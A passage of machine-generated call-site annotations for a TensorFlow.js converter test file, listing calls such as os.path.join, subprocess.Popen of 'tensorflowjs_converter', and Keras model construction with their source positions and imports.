'os.path.join', ({(541, 27, 541, 40): 'self._tmp_dir', (541, 42, 541, 52): '"""keras_h5"""', (541, 54, 541, 64): '"""model.h5"""'}, {}), "(self._tmp_dir, 'keras_h5', 'model.h5')", False, 'import os\n'), ((547, 14, 550, 6), 'subprocess.Popen', 'subprocess.Popen', ({(547, 31, 550, 5): "['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]"}, {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, self._tmp_dir])", False, 'import subprocess\n'), ((562, 14, 565, 31), 'subprocess.Popen', 'subprocess.Popen', (), '', False, 'import subprocess\n'), ((572, 14, 575, 31), 'subprocess.Popen', 'subprocess.Popen', (), '', False, 'import subprocess\n'), ((587, 20, 587, 38), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ({}, {}), '()', False, 'import tempfile\n'), ((590, 7, 590, 35), 'os.path.isdir', 'os.path.isdir', ({(590, 21, 590, 34): 'self._tmp_dir'}, {}), '(self._tmp_dir)', False, 'import os\n'), ((595, 12, 595, 30), 'tensorflow.keras.Sequential', 'keras.Sequential', ({}, {}), '()', False, 'from tensorflow import keras\n'), ((602, 12, 602, 30), 'tensorflow.keras.Sequential', 'keras.Sequential', ({}, {}), '()', False, 'from tensorflow import keras\n'), ((608, 13, 608, 35), 'tensorflow.keras.Input', 'keras.Input', (), '', False, 'from tensorflow import keras\n'), ((609, 13, 609, 36), 'tensorflow.keras.Input', 'keras.Input', (), '', False, 'from tensorflow import keras\n'), ((612, 12, 612, 44), 'tensorflow.keras.Model', 'keras.Model', ({(612, 24, 612, 40): '[input1, input2]', (612, 42, 612, 43): 'y'}, {}), '([input1, input2], y)', False, 'from tensorflow import keras\n'), ((835, 8, 835, 30), 'numpy.random.randn', 'np.random.randn', ({(835, 24, 835, 25): '8', (835, 27, 835, 29): '10'}, {}), '(8, 10)', True, 'import numpy as np\n'), ((838, 12, 838, 30), 'tensorflow.keras.Sequential', 'keras.Sequential', ({}, {}), '()', False, 'from tensorflow import keras\n'), ((842, 14, 842, 53), 'os.path.join', 'os.path.join', ({(842, 27, 842, 40): 'self._tmp_dir', (842, 42, 842, 52): '"""model.h5"""'}, {}), "(self._tmp_dir, 'model.h5')", False, 'import os\n'), ((846, 30, 846, 72), 'os.path.join', 'os.path.join', ({(846, 43, 846, 56): 'self._tmp_dir', (846, 58, 846, 71): '"""tfjs_layers"""'}, {}), "(self._tmp_dir, 'tfjs_layers')", False, 'import os\n'), ((848, 14, 851, 6), 'subprocess.Popen', 'subprocess.Popen', ({(848, 31, 851, 5): "['tensorflowjs_converter', '--input_format', 'keras', h5_path,\n layers_model_output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, layers_model_output_dir])", False, 'import subprocess\n'), ((856, 22, 856, 63), 'os.path.join', 'os.path.join', ({(856, 35, 856, 48): 'self._tmp_dir', (856, 50, 856, 62): '"""tfjs_graph"""'}, {}), "(self._tmp_dir, 'tfjs_graph')", False, 'import os\n'), ((83, 9, 83, 44), 'tensorflow.compat.v1.name_scope', 'tf.compat.v1.name_scope', ({(83, 33, 83, 43): 'name_scope'}, {}), '(name_scope)', True, 'import tensorflow as tf\n'), ((84, 10, 84, 60), 'tensorflow.compat.v1.constant', 'tf.compat.v1.constant', ({(84, 32, 84, 59): '[[37.0, -23.0], [1.0, 4.0]]'}, {}), '([[37.0, -23.0], [1.0, 4.0]])', True, 'import tensorflow as tf\n'), ((85, 10, 85, 54), 'tensorflow.compat.v1.get_variable', 'tf.compat.v1.get_variable', (), '', True, 'import tensorflow as tf\n'), ((86, 10, 86, 35), 'tensorflow.compat.v1.matmul', 'tf.compat.v1.matmul', ({(86, 30, 86, 31): 'x', (86, 33, 86, 34): 'w'}, {}), '(x, w)', True, 'import tensorflow as tf\n'), ((87, 15, 87, 41), 'tensorflow.compat.v1.nn.softmax', 
'tf.compat.v1.nn.softmax', ({(87, 39, 87, 40): 'y'}, {}), '(y)', True, 'import tensorflow as tf\n'), ((91, 16, 91, 77), 'tensorflow.compat.v1.saved_model.builder.SavedModelBuilder', 'tf.compat.v1.saved_model.builder.SavedModelBuilder', ({(91, 67, 91, 76): 'save_path'}, {}), '(save_path)', True, 'import tensorflow as tf\n'), ((145, 13, 145, 56), 'tensorflow.compat.v1.global_variables_initializer', 'tf.compat.v1.global_variables_initializer', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((179, 6, 179, 34), 'shutil.rmtree', 'shutil.rmtree', ({(179, 20, 179, 33): 'self._tmp_dir'}, {}), '(self._tmp_dir)', False, 'import shutil\n'), ((183, 24, 183, 51), 'tensorflowjs.__version__.count', 'tfjs.__version__.count', ({(183, 47, 183, 50): '"""."""'}, {}), "('.')", True, 'import tensorflowjs as tfjs\n'), ((190, 6, 190, 60), 'tensorflowjs.converters.save_keras_model', 'tfjs.converters.save_keras_model', ({(190, 39, 190, 44): 'model', (190, 46, 190, 59): 'self._tmp_dir'}, {}), '(model, self._tmp_dir)', True, 'import tensorflowjs as tfjs\n'), ((227, 34, 227, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((230, 6, 230, 61), 'tensorflowjs.converters.save_keras_model', 'tfjs.converters.save_keras_model', ({(230, 39, 230, 45): 'model1', (230, 47, 230, 60): 'self._tmp_dir'}, {}), '(model1, self._tmp_dir)', True, 'import tensorflowjs as tfjs\n'), ((233, 34, 233, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((258, 37, 258, 63), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ({(258, 56, 258, 62): 'stderr'}, {}), '(stderr)', True, 'import tensorflow as tf\n'), ((269, 33, 269, 59), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ({(269, 52, 269, 58): 'stderr'}, {}), '(stderr)', True, 'import tensorflow as tf\n'), ((272, 34, 272, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((275, 16, 275, 67), 'os.path.join', 'os.path.join', ({(275, 29, 275, 42): 'self._tmp_dir', (275, 44, 275, 54): '"""keras_h5"""', (275, 56, 275, 66): '"""model.h5"""'}, {}), "(self._tmp_dir, 'keras_h5', 'model.h5')", False, 'import os\n'), ((278, 16, 281, 8), 'subprocess.Popen', 'subprocess.Popen', ({(278, 33, 281, 7): "['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]"}, {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, self._tmp_dir])", False, 'import subprocess\n'), ((326, 34, 326, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((329, 16, 329, 67), 'os.path.join', 'os.path.join', ({(329, 29, 329, 42): 'self._tmp_dir', (329, 44, 329, 54): '"""keras_h5"""', (329, 56, 329, 66): '"""model.h5"""'}, {}), "(self._tmp_dir, 'keras_h5', 'model.h5')", False, 'import os\n'), ((332, 16, 335, 8), 'subprocess.Popen', 'subprocess.Popen', ({(332, 33, 335, 7): "['tensorflowjs_converter', '--input_format', 'keras',\n '--split_weights_by_layer', h5_path, self._tmp_dir]"}, {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n '--split_weights_by_layer', h5_path, self._tmp_dir])", False, 'import subprocess\n'), ((393, 8, 393, 34), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ({(393, 27, 393, 33): 'stderr'}, {}), '(stderr)', True, 'import tensorflow as tf\n'), ((508, 16, 508, 55), 'os.path.join', 'os.path.join', ({(508, 29, 508, 42): 'self._tmp_dir', (508, 44, 508, 54): '"""keras_h5"""'}, {}), "(self._tmp_dir, 
'keras_h5')", False, 'import os\n'), ((510, 34, 510, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((533, 34, 533, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((534, 16, 534, 52), 'tensorflow.keras.models.load_model', 'keras.models.load_model', ({(534, 40, 534, 51): 'new_h5_path'}, {}), '(new_h5_path)', False, 'from tensorflow import keras\n'), ((540, 16, 540, 55), 'os.path.join', 'os.path.join', ({(540, 29, 540, 42): 'self._tmp_dir', (540, 44, 540, 54): '"""keras_h5"""'}, {}), "(self._tmp_dir, 'keras_h5')", False, 'import os\n'), ((542, 34, 542, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((555, 34, 555, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((569, 8, 569, 64), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ({(569, 27, 569, 63): "('tensorflowjs %s' % tfjs.__version__)"}, {}), "('tensorflowjs %s' % tfjs.__version__)", True, 'import tensorflow as tf\n'), ((570, 8, 570, 34), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ({(570, 27, 570, 33): 'stdout'}, {}), '(stdout)', True, 'import tensorflow as tf\n'), ((579, 8, 579, 64), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ({(579, 27, 579, 63): "('tensorflowjs %s' % tfjs.__version__)"}, {}), "('tensorflowjs %s' % tfjs.__version__)", True, 'import tensorflow as tf\n'), ((580, 8, 580, 34), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ({(580, 27, 580, 33): 'stdout'}, {}), '(stdout)', True, 'import tensorflow as tf\n'), ((591, 6, 591, 34), 'shutil.rmtree', 'shutil.rmtree', ({(591, 20, 591, 33): 'self._tmp_dir'}, {}), '(self._tmp_dir)', False, 'import shutil\n'), ((596, 14, 596, 59), 'tensorflow.keras.layers.Reshape', 'keras.layers.Reshape', (), '', False, 'from tensorflow import keras\n'), ((597, 14, 597, 35), 'tensorflow.keras.layers.LSTM', 'keras.layers.LSTM', ({(597, 32, 597, 34): '(10)'}, {}), '(10)', False, 'from tensorflow import keras\n'), ((598, 14, 598, 57), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (), '', False, 'from tensorflow import keras\n'), ((603, 14, 603, 72), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (), '', False, 'from tensorflow import keras\n'), ((610, 8, 610, 34), 'tensorflow.keras.layers.Concatenate', 'keras.layers.Concatenate', ({}, {}), '()', False, 'from tensorflow import keras\n'), ((611, 8, 611, 51), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (), '', False, 'from tensorflow import keras\n'), ((616, 34, 616, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((617, 10, 617, 32), 'numpy.random.randn', 'np.random.randn', ({(617, 26, 617, 27): '8', (617, 29, 617, 31): '10'}, {}), '(8, 10)', True, 'import numpy as np\n'), ((624, 6, 624, 65), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', ({(624, 44, 624, 49): 'model', (624, 51, 624, 64): 'self._tmp_dir'}, {}), '(model, self._tmp_dir)', False, 'from tensorflow import keras\n'), ((627, 24, 627, 59), 'os.path.join', 'os.path.join', ({(627, 37, 627, 50): 'self._tmp_dir', (627, 52, 627, 58): '"""tfjs"""'}, {}), "(self._tmp_dir, 'tfjs')", False, 'import os\n'), ((629, 16, 632, 8), 'subprocess.Popen', 'subprocess.Popen', ({(629, 33, 632, 7): "['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\n _tmp_dir, 
tfjs_output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])", False, 'import subprocess\n'), ((636, 24, 636, 67), 'os.path.join', 'os.path.join', ({(636, 37, 636, 52): 'tfjs_output_dir', (636, 54, 636, 66): '"""model.json"""'}, {}), "(tfjs_output_dir, 'model.json')", False, 'import os\n'), ((640, 20, 640, 60), 'os.path.join', 'os.path.join', ({(640, 33, 640, 46): 'self._tmp_dir', (640, 48, 640, 59): '"""new_h5.h5"""'}, {}), "(self._tmp_dir, 'new_h5.h5')", False, 'import os\n'), ((641, 16, 643, 68), 'subprocess.Popen', 'subprocess.Popen', ({(641, 33, 643, 67): "['tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'keras', model_json_path, new_h5_path]"}, {}), "(['tensorflowjs_converter', '--input_format',\n 'tfjs_layers_model', '--output_format', 'keras', model_json_path,\n new_h5_path])", False, 'import subprocess\n'), ((651, 20, 651, 56), 'tensorflow.keras.models.load_model', 'keras.models.load_model', ({(651, 44, 651, 55): 'new_h5_path'}, {}), '(new_h5_path)', False, 'from tensorflow import keras\n'), ((656, 34, 656, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((657, 11, 657, 32), 'numpy.random.randn', 'np.random.randn', ({(657, 27, 657, 28): '4', (657, 30, 657, 31): '8'}, {}), '(4, 8)', True, 'import numpy as np\n'), ((658, 11, 658, 33), 'numpy.random.randn', 'np.random.randn', ({(658, 27, 658, 28): '4', (658, 30, 658, 32): '10'}, {}), '(4, 10)', True, 'import numpy as np\n'), ((665, 6, 665, 65), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', ({(665, 44, 665, 49): 'model', (665, 51, 665, 64): 'self._tmp_dir'}, {}), '(model, self._tmp_dir)', False, 'from tensorflow import keras\n'), ((668, 24, 668, 59), 'os.path.join', 'os.path.join', ({(668, 37, 668, 50): 'self._tmp_dir', (668, 52, 668, 58): '"""tfjs"""'}, {}), "(self._tmp_dir, 'tfjs')", False, 'import os\n'), ((670, 16, 674, 8), 'subprocess.Popen', 'subprocess.Popen', ({(670, 33, 674, 7): "['tensorflowjs_converter', '--input_format', 'keras_saved_model',\n '--output_format', 'tfjs_layers_model', self._tmp_dir, tfjs_output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', '--output_format', 'tfjs_layers_model', self.\n _tmp_dir, tfjs_output_dir])", False, 'import subprocess\n'), ((678, 24, 678, 67), 'os.path.join', 'os.path.join', ({(678, 37, 678, 52): 'tfjs_output_dir', (678, 54, 678, 66): '"""model.json"""'}, {}), "(tfjs_output_dir, 'model.json')", False, 'import os\n'), ((682, 20, 682, 60), 'os.path.join', 'os.path.join', ({(682, 33, 682, 46): 'self._tmp_dir', (682, 48, 682, 59): '"""new_h5.h5"""'}, {}), "(self._tmp_dir, 'new_h5.h5')", False, 'import os\n'), ((683, 16, 685, 68), 'subprocess.Popen', 'subprocess.Popen', ({(683, 33, 685, 67): "['tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'keras', model_json_path, new_h5_path]"}, {}), "(['tensorflowjs_converter', '--input_format',\n 'tfjs_layers_model', '--output_format', 'keras', model_json_path,\n new_h5_path])", False, 'import subprocess\n'), ((693, 20, 693, 56), 'tensorflow.keras.models.load_model', 'keras.models.load_model', ({(693, 44, 693, 55): 'new_h5_path'}, {}), '(new_h5_path)', False, 'from tensorflow import keras\n'), ((698, 34, 698, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((699, 10, 699, 32), 'numpy.random.randn', 
'np.random.randn', ({(699, 26, 699, 27): '8', (699, 29, 699, 31): '10'}, {}), '(8, 10)', True, 'import numpy as np\n'), ((706, 6, 706, 65), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', ({(706, 44, 706, 49): 'model', (706, 51, 706, 64): 'self._tmp_dir'}, {}), '(model, self._tmp_dir)', False, 'from tensorflow import keras\n'), ((709, 24, 709, 59), 'os.path.join', 'os.path.join', ({(709, 37, 709, 50): 'self._tmp_dir', (709, 52, 709, 58): '"""tfjs"""'}, {}), "(self._tmp_dir, 'tfjs')", False, 'import os\n'), ((711, 16, 717, 33), 'subprocess.Popen', 'subprocess.Popen', (), '', False, 'import subprocess\n'), ((724, 34, 724, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((725, 10, 725, 32), 'numpy.random.randn', 'np.random.randn', ({(725, 26, 725, 27): '8', (725, 29, 725, 31): '10'}, {}), '(8, 10)', True, 'import numpy as np\n'), ((735, 6, 735, 65), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', ({(735, 44, 735, 49): 'model', (735, 51, 735, 64): 'self._tmp_dir'}, {}), '(model, self._tmp_dir)', False, 'from tensorflow import keras\n'), ((738, 24, 738, 59), 'os.path.join', 'os.path.join', ({(738, 37, 738, 50): 'self._tmp_dir', (738, 52, 738, 58): '"""tfjs"""'}, {}), "(self._tmp_dir, 'tfjs')", False, 'import os\n'), ((740, 16, 743, 8), 'subprocess.Popen', 'subprocess.Popen', ({(740, 33, 743, 7): "['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\n _tmp_dir, tfjs_output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])", False, 'import subprocess\n'), ((751, 26, 751, 69), 'os.path.join', 'os.path.join', ({(751, 39, 751, 52): 'self._tmp_dir', (751, 54, 751, 68): '"""tfjs_sharded"""'}, {}), "(self._tmp_dir, 'tfjs_sharded')", False, 'import os\n'), ((772, 20, 772, 60), 'os.path.join', 'os.path.join', ({(772, 33, 772, 46): 'self._tmp_dir', (772, 48, 772, 59): '"""new_h5.h5"""'}, {}), "(self._tmp_dir, 'new_h5.h5')", False, 'import os\n'), ((780, 34, 780, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((783, 18, 783, 54), 'tensorflow.keras.models.load_model', 'keras.models.load_model', ({(783, 42, 783, 53): 'new_h5_path'}, {}), '(new_h5_path)', False, 'from tensorflow import keras\n'), ((788, 34, 788, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((789, 10, 789, 32), 'numpy.random.randn', 'np.random.randn', ({(789, 26, 789, 27): '8', (789, 29, 789, 31): '10'}, {}), '(8, 10)', True, 'import numpy as np\n'), ((799, 6, 799, 65), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', ({(799, 44, 799, 49): 'model', (799, 51, 799, 64): 'self._tmp_dir'}, {}), '(model, self._tmp_dir)', False, 'from tensorflow import keras\n'), ((802, 24, 802, 59), 'os.path.join', 'os.path.join', ({(802, 37, 802, 50): 'self._tmp_dir', (802, 52, 802, 58): '"""tfjs"""'}, {}), "(self._tmp_dir, 'tfjs')", False, 'import os\n'), ((804, 16, 807, 8), 'subprocess.Popen', 'subprocess.Popen', ({(804, 33, 807, 7): "['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\n _tmp_dir, tfjs_output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])", False, 'import subprocess\n'), ((815, 26, 815, 69), 'os.path.join', 'os.path.join', ({(815, 39, 815, 52): 
'self._tmp_dir', (815, 54, 815, 68): '"""tfjs_sharded"""'}, {}), "(self._tmp_dir, 'tfjs_sharded')", False, 'import os\n'), ((829, 25, 829, 57), 'os.path.getsize', 'os.path.getsize', ({(829, 41, 829, 56): 'weight_files[0]'}, {}), '(weight_files[0])', False, 'import os\n'), ((839, 14, 839, 72), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (), '', False, 'from tensorflow import keras\n'), ((840, 14, 840, 57), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (), '', False, 'from tensorflow import keras\n'), ((93, 11, 93, 33), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((170, 21, 170, 46), 'os.path.dirname', 'os.path.dirname', ({(170, 37, 170, 45): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((194, 23, 194, 35), 'json.load', 'json.load', ({(194, 33, 194, 34): 'f'}, {}), '(f)', False, 'import json\n'), ((236, 10, 236, 51), 'os.path.join', 'os.path.join', ({(236, 23, 236, 36): 'self._tmp_dir', (236, 38, 236, 50): '"""model.json"""'}, {}), "(self._tmp_dir, 'model.json')", False, 'import os\n'), ((246, 30, 246, 69), 'os.path.join', 'os.path.join', ({(246, 43, 246, 56): 'self._tmp_dir', (246, 58, 246, 68): '"""group*-*"""'}, {}), "(self._tmp_dir, 'group*-*')", False, 'import os\n'), ((274, 18, 274, 57), 'os.path.join', 'os.path.join', ({(274, 31, 274, 44): 'self._tmp_dir', (274, 46, 274, 56): '"""keras_h5"""'}, {}), "(self._tmp_dir, 'keras_h5')", False, 'import os\n'), ((287, 23, 287, 35), 'json.load', 'json.load', ({(287, 33, 287, 34): 'f'}, {}), '(f)', False, 'import json\n'), ((328, 18, 328, 57), 'os.path.join', 'os.path.join', ({(328, 31, 328, 44): 'self._tmp_dir', (328, 46, 328, 56): '"""keras_h5"""'}, {}), "(self._tmp_dir, 'keras_h5')", False, 'import os\n'), ((341, 23, 341, 35), 'json.load', 'json.load', ({(341, 33, 341, 34): 'f'}, {}), '(f)', False, 'import json\n'), ((384, 12, 384, 49), 'os.path.join', 'os.path.join', ({(384, 25, 384, 38): 'self._tmp_dir', (384, 40, 384, 48): '"""foo.h5"""'}, {}), "(self._tmp_dir, 'foo.h5')", False, 'import os\n'), ((385, 12, 385, 49), 'os.path.join', 'os.path.join', ({(385, 25, 385, 38): 'self._tmp_dir', (385, 40, 385, 48): '"""output"""'}, {}), "(self._tmp_dir, 'output')", False, 'import os\n'), ((411, 13, 411, 51), 'os.path.join', 'os.path.join', ({(411, 26, 411, 36): 'output_dir', (411, 38, 411, 50): '"""model.json"""'}, {}), "(output_dir, 'model.json')", False, 'import os\n'), ((415, 30, 415, 66), 'os.path.join', 'os.path.join', ({(415, 43, 415, 53): 'output_dir', (415, 55, 415, 65): '"""group*-*"""'}, {}), "(output_dir, 'group*-*')", False, 'import os\n'), ((437, 13, 437, 51), 'os.path.join', 'os.path.join', ({(437, 26, 437, 36): 'output_dir', (437, 38, 437, 50): '"""model.json"""'}, {}), "(output_dir, 'model.json')", False, 'import os\n'), ((441, 30, 441, 66), 'os.path.join', 'os.path.join', ({(441, 43, 441, 53): 'output_dir', (441, 55, 441, 65): '"""group*-*"""'}, {}), "(output_dir, 'group*-*')", False, 'import os\n'), ((464, 13, 464, 51), 'os.path.join', 'os.path.join', ({(464, 26, 464, 36): 'output_dir', (464, 38, 464, 50): '"""model.json"""'}, {}), "(output_dir, 'model.json')", False, 'import os\n'), ((479, 30, 479, 66), 'os.path.join', 'os.path.join', ({(479, 43, 479, 53): 'output_dir', (479, 55, 479, 65): '"""group*-*"""'}, {}), "(output_dir, 'group*-*')", False, 'import os\n'), ((500, 13, 500, 51), 'os.path.join', 'os.path.join', ({(500, 26, 500, 36): 'output_dir', (500, 38, 500, 50): '"""model.json"""'}, {}), "(output_dir, 'model.json')", False, 
'import os\n'), ((504, 30, 504, 66), 'os.path.join', 'os.path.join', ({(504, 43, 504, 53): 'output_dir', (504, 55, 504, 65): '"""group*-*"""'}, {}), "(output_dir, 'group*-*')", False, 'import os\n'), ((527, 8, 527, 49), 'os.path.join', 'os.path.join', ({(527, 21, 527, 34): 'self._tmp_dir', (527, 36, 527, 48): '"""model.json"""'}, {}), "(self._tmp_dir, 'model.json')", False, 'import os\n'), ((557, 10, 557, 51), 'os.path.join', 'os.path.join', ({(557, 23, 557, 36): 'self._tmp_dir', (557, 38, 557, 50): '"""model.json"""'}, {}), "(self._tmp_dir, 'model.json')", False, 'import os\n'), ((637, 22, 637, 53), 'os.path.isfile', 'os.path.isfile', ({(637, 37, 637, 52): 'model_json_path'}, {}), '(model_json_path)', False, 'import os\n'), ((647, 22, 647, 49), 'os.path.isfile', 'os.path.isfile', ({(647, 37, 647, 48): 'new_h5_path'}, {}), '(new_h5_path)', False, 'import os\n'), ((679, 22, 679, 53), 'os.path.isfile', 'os.path.isfile', ({(679, 37, 679, 52): 'model_json_path'}, {}), '(model_json_path)', False, 'import os\n'), ((689, 22, 689, 49), 'os.path.isfile', 'os.path.isfile', ({(689, 37, 689, 48): 'new_h5_path'}, {}), '(new_h5_path)', False, 'import os\n'), ((721, 43, 721, 69), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ({(721, 62, 721, 68): 'stderr'}, {}), '(stderr)', True, 'import tensorflow as tf\n'), ((765, 27, 765, 45), 'os.path.getsize', 'os.path.getsize', ({(765, 43, 765, 44): 'f'}, {}), '(f)', False, 'import os\n'), ((860, 8, 860, 59), 'os.path.join', 'os.path.join', ({(860, 21, 860, 44): 'layers_model_output_dir', (860, 46, 860, 58): '"""model.json"""'}, {}), "(layers_model_output_dir, 'model.json')", False, 'import os\n'), ((866, 35, 866, 78), 'os.path.join', 'os.path.join', ({(866, 48, 866, 63): 'graph_model_dir', (866, 65, 866, 77): '"""model.json"""'}, {}), "(graph_model_dir, 'model.json')", False, 'import os\n'), ((868, 18, 868, 61), 'os.path.join', 'os.path.join', ({(868, 31, 868, 46): 'graph_model_dir', (868, 48, 868, 60): '"""group*.bin"""'}, {}), "(graph_model_dir, 'group*.bin')", False, 'import os\n'), ((193, 16, 193, 57), 'os.path.join', 'os.path.join', ({(193, 29, 193, 42): 'self._tmp_dir', (193, 44, 193, 56): '"""model.json"""'}, {}), "(self._tmp_dir, 'model.json')", False, 'import os\n'), ((227, 9, 227, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((233, 9, 233, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((272, 9, 272, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((286, 16, 286, 57), 'os.path.join', 'os.path.join', ({(286, 29, 286, 42): 'self._tmp_dir', (286, 44, 286, 56): '"""model.json"""'}, {}), "(self._tmp_dir, 'model.json')", False, 'import os\n'), ((326, 9, 326, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((340, 16, 340, 57), 'os.path.join', 'os.path.join', ({(340, 29, 340, 42): 'self._tmp_dir', (340, 44, 340, 56): '"""model.json"""'}, {}), "(self._tmp_dir, 'model.json')", False, 'import os\n'), ((510, 9, 510, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((533, 9, 533, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((542, 9, 542, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((555, 9, 555, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((616, 9, 616, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import 
tensorflow as tf\n'), ((656, 9, 656, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((698, 9, 698, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((724, 9, 724, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((756, 10, 756, 53), 'os.path.join', 'os.path.join', ({(756, 23, 756, 38): 'tfjs_output_dir', (756, 40, 756, 52): '"""model.json"""'}, {}), "(tfjs_output_dir, 'model.json')", False, 'import os\n'), ((763, 20, 763, 65), 'os.path.join', 'os.path.join', ({(763, 33, 763, 50): 'sharded_model_dir', (763, 52, 763, 64): '"""group*.bin"""'}, {}), "(sharded_model_dir, 'group*.bin')", False, 'import os\n'), ((775, 10, 775, 55), 'os.path.join', 'os.path.join', ({(775, 23, 775, 40): 'sharded_model_dir', (775, 42, 775, 54): '"""model.json"""'}, {}), "(sharded_model_dir, 'model.json')", False, 'import os\n'), ((780, 9, 780, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((788, 9, 788, 19), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((820, 10, 820, 53), 'os.path.join', 'os.path.join', ({(820, 23, 820, 38): 'tfjs_output_dir', (820, 40, 820, 52): '"""model.json"""'}, {}), "(tfjs_output_dir, 'model.json')", False, 'import os\n'), ((827, 20, 827, 65), 'os.path.join', 'os.path.join', ({(827, 33, 827, 50): 'sharded_model_dir', (827, 52, 827, 64): '"""group*.bin"""'}, {}), "(sharded_model_dir, 'group*.bin')", False, 'import os\n'), ((323, 27, 323, 64), 'os.path.join', 'os.path.join', ({(323, 40, 323, 53): 'self._tmp_dir', (323, 55, 323, 63): '"""group*"""'}, {}), "(self._tmp_dir, 'group*')", False, 'import os\n'), ((377, 27, 377, 64), 'os.path.join', 'os.path.join', ({(377, 40, 377, 53): 'self._tmp_dir', (377, 55, 377, 63): '"""group*"""'}, {}), "(self._tmp_dir, 'group*')", False, 'import os\n'), ((733, 31, 733, 41), 'numpy.size', 'np.size', ({(733, 39, 733, 40): 'w'}, {}), '(w)', True, 'import numpy as np\n'), ((797, 31, 797, 41), 'numpy.size', 'np.size', ({(797, 39, 797, 40): 'w'}, {}), '(w)', True, 'import numpy as np\n'), ((101, 20, 103, 51), 'tensorflow.compat.v1.saved_model.signature_def_utils.predict_signature_def', 